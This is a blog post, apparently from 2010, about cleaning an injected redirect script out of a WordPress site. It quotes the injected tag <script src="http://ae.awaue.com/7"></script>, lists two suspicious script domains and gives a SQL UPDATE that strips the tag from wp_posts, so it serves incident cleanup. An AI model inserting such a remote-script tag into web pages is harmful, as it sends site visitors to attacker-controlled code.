IT技术博客大学习 共学习 共进步
全部 移动开发 后端 数据库 AI 算法 安全 DevOps 前端 设计 开发者

WordPress重定向漏洞

B3 bohemia's 2010-07-18 23:37:32 累计浏览 4,681 次
本机暂存

今天访问自己blog时突然发现特慢,半天右栏都没加载出来。看了下状态栏,发现卡在一个url上过不去(http://ae.awaue.com/7),我想了又想,重来没有调用过外站资源,特别时这个陌生的站。第一反应就是可能被挂马了,上网查了一下没有太具体的说法,访问了下上面这个url也打不开,心生可疑。因为首页里只发现两条如下脚本,想实在没有方法解决,就先干掉这两个,过段时间看看情况。

<script src="http://ae.awaue.com/7"></script>

症状:

  • 浏览你网站文章的用户可能被重定向的第三方网站。(我今天遇到过一次,开始还纳闷我是点了什么跳到一个不认识的网站去的)
  • 也可能被重定向到googlesearch.com,不过这个已被禁用。

但好在最后还是依赖(mt)自己的wiki解决了这个问题,我绝非第一个遇到这问题,以后可能会复发,别的WPer也可能遇到,留个存档,出问题好回查。

解决方案如下,范讲一下,不只针对(mt)主机:

  • 登录你主机的管理后台,进入数据库管理,也就是mysqladmin
  • 在左边列表里找到你的wordpress所在数据库,如db_blog
  • 点击进入后,在顶部找到”SQL”一项,点击
  • 然后我们在输入框里输入以下语句,目的查找wp_posts里所有信息,并替换掉其中有害信息:

UPDATE wp_posts SET post_content = replace( post_content, '<script src="http://ae.awaue.com/7"></script>', ' ')

  • 接下来运行这段语句
  • 最后看一下影响了多少行,如果是0,说明你还没中招。我的跑了一下共替换了1200多条……

需要注意的是:上面的例子语句是举的默认情况,如果你的表名不是以wp_开头的,请换成你自己的,不要直接复制粘贴。

目前已发现的可疑脚本有以下两个:

  • ae.awaue.com/7
  • ie.eracou.com/3

如果未来发现有新的可疑脚本,请随时留意这里的更新

同分类推荐文章

  1. 绿盟科技《APT组织研究年鉴》(2026 版)正式发布 (2026-06-16 20:21:10)
  2. 【已复现】Linux内核Fragnesia权限提升漏洞(CVE-2026-46300) (2026-06-15 10:53:58)
  3. 企业文档安全最佳实践(二):给文档上“身份证”——手动标密与智能自动标密 (2026-06-12 17:18:33)

查看更多 安全 文章 →

建议继续学习

  1. WordPress插件开发 -- 在插件使用数据库存储数据 (累计阅读 29,164)
  2. WordPress评论翻页造成404页面的解决方案 (累计阅读 9,539)
  3. WordPress安全建议 (累计阅读 6,382)
  4. WordPress插件开发--获知文章状态变化 (累计阅读 5,653)
  5. WordPress数据字典 (累计阅读 5,437)
  6. nginx在fastcgi模块中转发真实的后端IP (累计阅读 5,077)
  7. 在wordpress中使用Google Reader “Send To” (累计阅读 5,027)
  8. WordPress模板的image.php (累计阅读 4,756)
  9. SEO:wordpress页面标记优化 (累计阅读 4,735)
  10. Trackback,Pingback及XML-RPC (累计阅读 4,647)